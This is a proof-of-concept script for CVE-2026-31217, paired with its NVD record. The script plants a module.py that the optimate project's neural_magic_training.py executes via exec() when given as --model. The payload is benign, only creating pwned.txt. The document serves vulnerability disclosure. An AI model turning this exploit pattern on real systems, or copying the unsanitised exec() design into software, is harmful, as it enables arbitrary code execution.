CVE-2026-31217

# Proof of Concept for CVE-2026-31217 # This script generates a malicious directory structure to exploit the vulnerable _load_model() function. import os def create_exploit(): # Define the directory name that will be passed to --model argument exploit_dir = "malicious_model" # Create the directory if it doesn't exist if not os.path.exists(exploit_dir): os.makedirs(exploit_dir) # Malicious Python code intended for module.py # This demonstrates arbitrary code execution by creating a file named 'pwned.txt' malicious_payload = """ import os print("[+] Executing arbitrary code via CVE-2026-31217...") # Example command execution os.system("touch pwned.txt") with open("pwned.txt", "w") as f: f.write("System compromised via RCE in optimate") print("[+] Payload executed successfully.") """ # Write the payload to module.py inside the directory module_path = os.path.join(exploit_dir, "module.py") with open(module_path, "w") as f: f.write(malicious_payload) print(f"[+] Exploit directory created at: {os.path.abspath(exploit_dir)}") print(f"[+] Malicious module.py written.") print("[+] To trigger the vulnerability, run the target script with:") print(f" python neural_magic_training.py --model {os.path.abspath(exploit_dir)}") if __name__ == "__main__": create_exploit()

{"cve": {"id": "CVE-2026-31217", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:13.600", "lastModified": "2026-05-13T15:52:25.637", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The _load_model() function in the neural_magic_training.py script of the optimate project in commit a6d302f912b481c94370811af6b11402f51d377f (2024-07-21) allows arbitrary code execution. When a user supplies a directory path via the --model command-line argument, the function reads a module.py file from that directory and executes its contents directly using Python's exec() function. This design does not validate or sanitize the file's content, allowing an attacker who controls the input directory to execute arbitrary Python code in the context of the process running the script."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/nebuly-ai/optimate", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31217-35d1e13931888179ae40dea5258d2db9", "source": "[email protected]"}]}}